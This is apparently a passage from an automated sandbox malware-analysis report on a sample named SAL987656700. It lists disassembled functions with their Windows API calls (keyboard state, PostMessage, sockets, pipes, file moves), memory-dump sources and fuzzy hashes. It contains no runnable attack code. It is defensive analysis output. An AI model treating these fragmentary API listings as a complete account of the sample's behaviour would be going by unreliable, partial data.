                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                      • String ID:
                                      • API String ID: 4196846111-0
                                      • Opcode ID: ca7649d149a72c70588ebc33249ff0df0659729b9268f5d5990d6f5bd089f651
                                      • Instruction ID: 0b6043b221e3dd7a7d0bfab5b0de1ba1fe4ec2169033e3dbb6d8eac57923494b
                                      • Opcode Fuzzy Hash: ca7649d149a72c70588ebc33249ff0df0659729b9268f5d5990d6f5bd089f651
                                      • Instruction Fuzzy Hash: 01718D75A04209AFCB14EF68C841AEEB7F5FF48310F148858E926EB351DB34AD918B91
                                      Function 008EAEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetParent.USER32(?), ref: 008EAEF9
                                      • GetKeyboardState.USER32(?), ref: 008EAF0E
                                      • SetKeyboardState.USER32(?), ref: 008EAF6F
                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 008EAF9D
                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 008EAFBC
                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 008EAFFD
                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 008EB020
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: MessagePost$KeyboardState$Parent
                                      • String ID:
                                      • API String ID: 87235514-0
                                      • Opcode ID: 5fc4b1a5d89e513d186b13cf50068e5024febe439f31064891f600df02657477
                                      • Instruction ID: 1bdc6c9a97950fdf50a8862500e0dc4e40e3ecaba40734e1d8cd40459b65b1c6
                                      • Opcode Fuzzy Hash: 5fc4b1a5d89e513d186b13cf50068e5024febe439f31064891f600df02657477
                                      • Instruction Fuzzy Hash: F851D2A06047D53DFB3A43758845BBB7EA9AB07704F088489E1E5D54C2C798FC84D752
                                      Function 008EACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetParent.USER32(00000000), ref: 008EAD19
                                      • GetKeyboardState.USER32(?), ref: 008EAD2E
                                      • SetKeyboardState.USER32(?), ref: 008EAD8F
                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 008EADBB
                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 008EADD8
                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 008EAE17
                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 008EAE38
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: MessagePost$KeyboardState$Parent
                                      • String ID:
                                      • API String ID: 87235514-0
                                      • Opcode ID: 4c537c798b2d83bfa40bca88b0b24edbf748eedd6b12b326c5860baefe92b741
                                      • Instruction ID: ca605b4881d27d2de9bb1eda1834cd1f5b5221efd1eb65bf709dd32c62ce97b9
                                      • Opcode Fuzzy Hash: 4c537c798b2d83bfa40bca88b0b24edbf748eedd6b12b326c5860baefe92b741
                                      • Instruction Fuzzy Hash: 6F51D6A16047D63DFB3A42658C95BBA7E99FF47B00F088488E1D5D68C2C294FC88D752
                                      Function 008B542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetConsoleCP.KERNEL32(008C3CD6,?,?,?,?,?,?,?,?,008B5BA3,?,?,008C3CD6,?,?), ref: 008B5470
                                      • __fassign.LIBCMT ref: 008B54EB
                                      • __fassign.LIBCMT ref: 008B5506
                                      • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,008C3CD6,00000005,00000000,00000000), ref: 008B552C
                                      • WriteFile.KERNEL32(?,008C3CD6,00000000,008B5BA3,00000000,?,?,?,?,?,?,?,?,?,008B5BA3,?), ref: 008B554B
                                      • WriteFile.KERNEL32(?,?,00000001,008B5BA3,00000000,?,?,?,?,?,?,?,?,?,008B5BA3,?), ref: 008B5584
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                      • String ID:
                                      • API String ID: 1324828854-0
                                      • Opcode ID: 50002bb04ece7f38e2b517dcfe7b1084930c5a64f62aad0f8156088bf44833c6
                                      • Instruction ID: be16a165de4fec89cbe64faf855c3d114f47231d48e5cc1a9bbd5642cb690863
                                      • Opcode Fuzzy Hash: 50002bb04ece7f38e2b517dcfe7b1084930c5a64f62aad0f8156088bf44833c6
                                      • Instruction Fuzzy Hash: EE51C0B0A00649AFDB20CFA8D851BEEBBF9FF09301F14411AE955E7391D6309A45CB60
                                      Function 008A2D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                      Download Yara Rule
                                      APIs
                                      • _ValidateLocalCookies.LIBCMT ref: 008A2D4B
                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 008A2D53
                                      • _ValidateLocalCookies.LIBCMT ref: 008A2DE1
                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 008A2E0C
                                      • _ValidateLocalCookies.LIBCMT ref: 008A2E61
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                      • String ID: csm
                                      • API String ID: 1170836740-1018135373
                                      • Opcode ID: e2d2a83e25aec50578f3c852dca7cb8c98bafcc8cc8d0b109a2aa7b6027ad002
                                      • Instruction ID: bdeae2b925621a8e6464ef1dc121ff0c331058d8658cfa396d7941c473053ece
                                      • Opcode Fuzzy Hash: e2d2a83e25aec50578f3c852dca7cb8c98bafcc8cc8d0b109a2aa7b6027ad002
                                      • Instruction Fuzzy Hash: 9441A134A0020DABDF20DF6CC845A9EBBB5FF46328F148165E814EBA53D735DA11CB91
                                      Function 009010B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0090304E: inet_addr.WS2_32(?), ref: 0090307A
                                        • Part of subcall function 0090304E: _wcslen.LIBCMT ref: 0090309B
                                      • socket.WS2_32(00000002,00000001,00000006), ref: 00901112
                                      • WSAGetLastError.WS2_32 ref: 00901121
                                      • WSAGetLastError.WS2_32 ref: 009011C9
                                      • closesocket.WS2_32(00000000), ref: 009011F9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                      • String ID:
                                      • API String ID: 2675159561-0
                                      • Opcode ID: 8dedbeaf464a86097bb24fbd4d860a9d76f1174c8c2ad48999ff77f301d1f2ad
                                      • Instruction ID: ed8c6b1affde3f21617861577291474a0fdbdfbf4d182faa8dac61ae4055c4d7
                                      • Opcode Fuzzy Hash: 8dedbeaf464a86097bb24fbd4d860a9d76f1174c8c2ad48999ff77f301d1f2ad
                                      • Instruction Fuzzy Hash: 3841D071604204AFDB14AF28C884BAABBE9FF85328F148059F9159B2D1C7B4ED41CBE1
                                      Function 008ECF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 008EDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,008ECF22,?), ref: 008EDDFD
                                        • Part of subcall function 008EDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,008ECF22,?), ref: 008EDE16
                                      • lstrcmpiW.KERNEL32(?,?), ref: 008ECF45
                                      • MoveFileW.KERNEL32(?,?), ref: 008ECF7F
                                      • _wcslen.LIBCMT ref: 008ED005
                                      • _wcslen.LIBCMT ref: 008ED01B
                                      • SHFileOperationW.SHELL32(?), ref: 008ED061
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                      • String ID: \*.*
                                      • API String ID: 3164238972-1173974218
                                      • Opcode ID: 26c4ad013f379712fbe6e3cb93d8726c64058114693bd68f58f49069c5d37fb5
                                      • Instruction ID: cef18912c166fed3f6be9425f6f82ad94481b6e1a932454ae7c039d1925d3734
                                      • Opcode Fuzzy Hash: 26c4ad013f379712fbe6e3cb93d8726c64058114693bd68f58f49069c5d37fb5
                                      • Instruction Fuzzy Hash: B84163B1D452585FDF12EBA5C981ADEB7B9FF09380F0000E6E505EB141EE74E689CB51
                                      Function 00912DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00912E1C
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00912E4F
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00912E84
                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00912EB6
                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00912EE0
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00912EF1
                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00912F0B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: LongWindow$MessageSend
                                      • String ID:
                                      • API String ID: 2178440468-0
                                      • Opcode ID: 37c66528cee20729561c974b56ec6b5df2dafaefd23046ccb4b6a34916689f93
                                      • Instruction ID: 4bb15f93cab3e273994e8c2721b80de6361eb52ae4d3ad1c6014c301e52c35dd
                                      • Opcode Fuzzy Hash: 37c66528cee20729561c974b56ec6b5df2dafaefd23046ccb4b6a34916689f93
                                      • Instruction Fuzzy Hash: C7311370758259AFDB20DF18EC94FA937E9EB8A751F144164F9118F2B1CB71ACA0EB00
                                      Function 008E7726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 008E7769
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 008E778F
                                      • SysAllocString.OLEAUT32(00000000), ref: 008E7792
                                      • SysAllocString.OLEAUT32(?), ref: 008E77B0
                                      • SysFreeString.OLEAUT32(?), ref: 008E77B9
                                      • StringFromGUID2.COMBASE(?,?,00000028), ref: 008E77DE
                                      • SysAllocString.OLEAUT32(?), ref: 008E77EC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                      • String ID:
                                      • API String ID: 3761583154-0
                                      • Opcode ID: 952fa06aead5c9ea4086efd4a78c76bc8cba8542cfcc005d151b2cfcf6a3fff4
                                      • Instruction ID: b24441efce7a6fe3a84a44710a848dd008fc4845563d8e1792cead15522bc019
                                      • Opcode Fuzzy Hash: 952fa06aead5c9ea4086efd4a78c76bc8cba8542cfcc005d151b2cfcf6a3fff4
                                      • Instruction Fuzzy Hash: BF217CB6608219AFDB10AFA9CC88CBB77ACFB0A7647048025BA15DB1A1D670DC42C760
                                      Function 008E77FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 008E7842
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 008E7868
                                      • SysAllocString.OLEAUT32(00000000), ref: 008E786B
                                      • SysAllocString.OLEAUT32 ref: 008E788C
                                      • SysFreeString.OLEAUT32 ref: 008E7895
                                      • StringFromGUID2.COMBASE(?,?,00000028), ref: 008E78AF
                                      • SysAllocString.OLEAUT32(?), ref: 008E78BD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                      • String ID:
                                      • API String ID: 3761583154-0
                                      • Opcode ID: 32bff49d3392f82c57495673ca656b8714bb494c6ddfcbf78f57d81b92d882af
                                      • Instruction ID: 063f5fb67be10ba364a43c54d831662989289b0f62ad898a1ee682098dc3d1bb
                                      • Opcode Fuzzy Hash: 32bff49d3392f82c57495673ca656b8714bb494c6ddfcbf78f57d81b92d882af
                                      • Instruction Fuzzy Hash: D1219075608228BFDB10AFA9DC88DAA77ACFB1A3607148135F915CB2A1D670DC41DB68
                                      Function 008F04D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetStdHandle.KERNEL32(0000000C), ref: 008F04F2
                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 008F052E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CreateHandlePipe
                                      • String ID: nul
                                      • API String ID: 1424370930-2873401336
                                      • Opcode ID: 601fb003617de282218eede845f8a2123d9e307d1ed72eeae8c826919e9c027a
                                      • Instruction ID: e25831850b68e961ccb136b2f28f79745828494ade4b2ff4002e9ba1c49a07ff
                                      • Opcode Fuzzy Hash: 601fb003617de282218eede845f8a2123d9e307d1ed72eeae8c826919e9c027a
                                      • Instruction Fuzzy Hash: 072153B56043099FDB205F79D844AA977A4FF48724F204A19F9A1E62D1D7B0D940DF20
                                      Function 008F05A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetStdHandle.KERNEL32(000000F6), ref: 008F05C6
                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 008F0601
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CreateHandlePipe
                                      • String ID: nul
                                      • API String ID: 1424370930-2873401336
                                      • Opcode ID: 9c691beec3a0d74c2dc52e4c31f954c29d554e190737b2aef6dda97ff33d0bef
                                      • Instruction ID: f40f547876bc8813ee5b628349aa5529d918646e30ce63f553cfb59e387c85a9
                                      • Opcode Fuzzy Hash: 9c691beec3a0d74c2dc52e4c31f954c29d554e190737b2aef6dda97ff33d0bef
                                      • Instruction Fuzzy Hash: C821A6B56043199FDB208F788C04AAA77E4FF95724F204A19FAA1E72D2D7B09860CF10
                                      Function 009140AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0088600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0088604C
                                        • Part of subcall function 0088600E: GetStockObject.GDI32(00000011), ref: 00886060
                                        • Part of subcall function 0088600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0088606A
                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00914112
                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0091411F
                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0091412A
                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00914139
                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00914145
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: MessageSend$CreateObjectStockWindow
                                      • String ID: Msctls_Progress32
                                      • API String ID: 1025951953-3636473452
                                      • Opcode ID: 841c9dcab74a2db09ec052b44f831b78eaadca63f788445466bf4b29021bc4cf
                                      • Instruction ID: e8ed8613a4e0113c2f669e48e8ce6f5f07694cbf933fec15dba9861eb1faaf68
                                      • Opcode Fuzzy Hash: 841c9dcab74a2db09ec052b44f831b78eaadca63f788445466bf4b29021bc4cf
                                      • Instruction Fuzzy Hash: 4011B2B225021DBEEF119F64CC85EE77F5DEF19798F004110BB18A6050C7729C61DBA4
                                      Function 008BD7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 008BD7A3: _free.LIBCMT ref: 008BD7CC
                                      • _free.LIBCMT ref: 008BD82D
                                        • Part of subcall function 008B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,008BD7D1,00000000,00000000,00000000,00000000,?,008BD7F8,00000000,00000007,00000000,?,008BDBF5,00000000), ref: 008B29DE
                                        • Part of subcall function 008B29C8: GetLastError.KERNEL32(00000000,?,008BD7D1,00000000,00000000,00000000,00000000,?,008BD7F8,00000000,00000007,00000000,?,008BDBF5,00000000,00000000), ref: 008B29F0
                                      • _free.LIBCMT ref: 008BD838
                                      • _free.LIBCMT ref: 008BD843
                                      • _free.LIBCMT ref: 008BD897
                                      • _free.LIBCMT ref: 008BD8A2
                                      • _free.LIBCMT ref: 008BD8AD
                                      • _free.LIBCMT ref: 008BD8B8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
